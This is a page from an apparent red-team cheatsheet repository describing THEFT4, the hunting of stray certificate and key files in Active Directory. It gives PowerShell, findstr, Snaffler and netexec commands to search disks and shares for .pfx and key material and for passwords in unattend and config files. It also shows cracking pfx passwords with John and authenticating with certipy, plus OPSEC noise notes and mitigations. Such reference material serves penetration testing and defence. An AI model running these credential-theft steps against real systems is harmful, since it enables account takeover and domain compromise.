daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

theft4-finding-certificate-files.md (3748B)


      1 ---
      2 title: "THEFT4 — Finding Certificate Files"
      3 description: "No cryptography needed here. Admins and automation constantly leave certificate material lying around: exported .pfx backups, id_rsa-style key files…"
      4 category: active-directory
      5 subcategory: "ADCS & Certificates"
      6 tags: ["active-directory", "adcs"]
      7 tools: ["NetExec", "Certipy", "John", "Snaffler", "OpenSSL"]
      8 difficulty: advanced
      9 updated: "2026-08-10"
     10 source: "vault:ActiveDirectory/ACL-ESC-Techniques/THEFT4 — Finding Certificate Files.md"
     11 ---
     12 # THEFT4 — Finding Certificate Files
     13 
     14 ## Quick Reference
     15 
     16 | Field | Value |
     17 |-------|-------|
     18 | **Category** | Credential Theft (file hunting) |
     19 | **Difficulty** | Low |
     20 | **Pre-requisites** | Read access to a filesystem / share |
     21 | **Tools** | Seatbelt, PowerShell, findstr, Snaffler, Certify |
     22 | **OPSEC Noise** | Low — read-only file discovery |
     23 | **One-liner** | Hunt loose certificate and key files (`.pfx .p12 .pem .key`) left on disk, shares, and in config/unattend files, then authenticate with any that carry an auth EKU. |
     24 
     25 ***
     26 
     27 ## What Is THEFT4?
     28 
     29 No cryptography needed here. Admins and automation constantly leave certificate material lying around: exported `.pfx` backups, `id_rsa`-style key files, `unattend.xml`/`sysprep` blobs, IIS bindings, web-app config, and network-share dumps. THEFT4 is systematic file hunting for these artefacts.
     30 
     31 ***
     32 
     33 ## Step 1 — Hunt Locally
     34 
     35 ```powershell
     36 # PowerShell — recursive search for common cert/key extensions
     37 Get-ChildItem -Path C:\ -Recurse -ErrorAction SilentlyContinue `
     38   -Include *.pfx,*.p12,*.pem,*.key,*.crt,*.cer,*.p7b,*.pkcs12,*.jks,*.keystore 2>$null |
     39   Select-Object FullName, Length, LastWriteTime
     40 ```
     41 
     42 ```cmd
     43 :: cmd / findstr sweep
     44 dir C:\ /s /b | findstr /i "\.pfx \.p12 \.pem \.key \.crt \.cer"
     45 
     46 :: Credentials frequently embedded here
     47 findstr /s /i "password" C:\*.xml C:\*.config 2>nul
     48 type C:\Windows\Panther\unattend.xml
     49 ```
     50 
     51 ```powershell
     52 # Seatbelt — dedicated modules
     53 Seatbelt.exe Certificates
     54 Seatbelt.exe InterestingFiles
     55 
     56 # Certify — find cert files
     57 Certify.exe find /files
     58 ```
     59 
     60 ***
     61 
     62 ## Step 2 — Hunt Shares
     63 
     64 ```bash
     65 # Snaffler (from a Windows foothold) — classifies findings, flags cert/key files
     66 Snaffler.exe -s -o snaffler.log
     67 
     68 # From Linux — spider readable shares with netexec, then grep
     69 netexec smb $TARGET -u user -p pass -M spider_plus
     70 ```
     71 
     72 ***
     73 
     74 ## Step 3 — Triage & Authenticate
     75 
     76 ```bash
     77 # Inspect what an unknown pfx contains (identity, EKU, expiry)
     78 certipy-ad cert -pfx found.pfx -password '' -nokey -out /dev/stdout   # peek
     79 openssl pkcs12 -info -in found.pfx -nodes                             # or openssl
     80 
     81 # If it has Client Auth / PKINIT EKU and a private key -> authenticate
     82 certipy-ad auth -pfx found.pfx -dc-ip $TARGET
     83 ```
     84 
     85 > [!tip] Password-protected pfx?
     86 > Crack it with John: `pfx2john found.pfx > pfx.hash && john --wordlist=rockyou.txt pfx.hash`. See john-cheatsheet (`--format=pfx`).
     87 
     88 ***
     89 
     90 ## OPSEC Considerations
     91 
     92 | Action | Artefact | Noise |
     93 | :-- | :-- | :-- |
     94 | Recursive `Get-ChildItem` | high disk I/O, possible EDR heuristic | 🟡 Medium |
     95 | Share spidering | SMB access logs on file servers | 🟡 Medium |
     96 | Reading a file | file-audit events (if enabled) | 🟢 Low |
     97 
     98 ***
     99 
    100 ## Mitigation
    101 
    102 - Never store `.pfx`/private keys on shares or in config/unattend files; use a secrets vault.
    103 - Scan the estate for stray key material (the same tools defenders can run).
    104 - Password-protect and short-date any exported certs; rotate on exposure.
    105 - Enable file-access auditing on sensitive shares.
    106 
    107 ***
    108 
    109 ## See Also
    110 
    111 - _ADCS Attack Methodology Guide · THEFT1 — Exporting Certificates and Keys · john-cheatsheet
    112 - Sources: SpecterOps *Certified Pre-Owned*; [Seatbelt](https://github.com/GhostPack/Seatbelt)